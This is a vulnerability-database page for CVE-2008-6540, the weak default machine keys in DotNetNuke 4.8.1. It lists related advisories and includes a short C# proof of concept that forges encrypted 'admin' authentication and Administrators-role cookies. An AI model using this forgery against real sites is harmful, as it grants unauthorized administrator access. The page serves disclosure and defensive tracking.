Lucene search
+L

DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption

🗓️ 21 Mar 2008 00:00:00Reported by Brian HolyfieldType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

DotNetNuke 4.8.1 Weak Encryption Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-6540
30 Mar 200901:30
attackerkb
Circl
CVE-2008-6540
21 Mar 200800:00
circl
CVE
CVE-2008-6540
30 Mar 200901:00
cve
Cvelist
CVE-2008-6540
30 Mar 200901:00
cvelist
Tenable Nessus
DNN (DotNetNuke) Upgrade Process ValidationKey Generation Weakness Privilege Escalation
25 Mar 200800:00
nessus
EUVD
EUVD-2022-4007
3 Oct 202520:07
euvd
Github Security Blog
DotNetNuke Default Machine Key Exposure
14 May 202202:38
github
NVD
CVE-2008-6540
30 Mar 200901:30
nvd
OSV
GHSA-GRW3-HJJM-5CJM DotNetNuke Default Machine Key Exposure
14 May 202202:38
osv
Prion
Design/Logic Flaw
30 Mar 200901:30
prion
Rows per page
source: https://www.securityfocus.com/bid/28391/info

DotNetNuke is prone to a weak encryption vulnerability.

An attacker can exploit this issue to decrypt sensitive data. Information obtained may lead to further attacks.

This issue affects DotNetNuke 4.8.1; other versions may also be affected.

  // Step 1: Generate the two FormsAuthenticationTickets
      FormsAuthenticationTicket  ticket1 = new FormsAuthenticationTicket("admin", true, 10000);
      FormsAuthenticationTicket ticket2 = new FormsAuthenticationTicket(2, "admin", System.DateTime.Now, System.DateTime.MaxValue, true, "Registered
Users;Subscribers;Administrators");


      // Step 2: Encrypt the FormsAuthenticationTickets
      string cookie1 = ".DOTNETNUKE=" + FormsAuthentication.Encrypt(ticket1);
      string cookie2 = "portalroles=" + FormsAuthentication.Encrypt(ticket2);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25.1
EPSS0.02495
22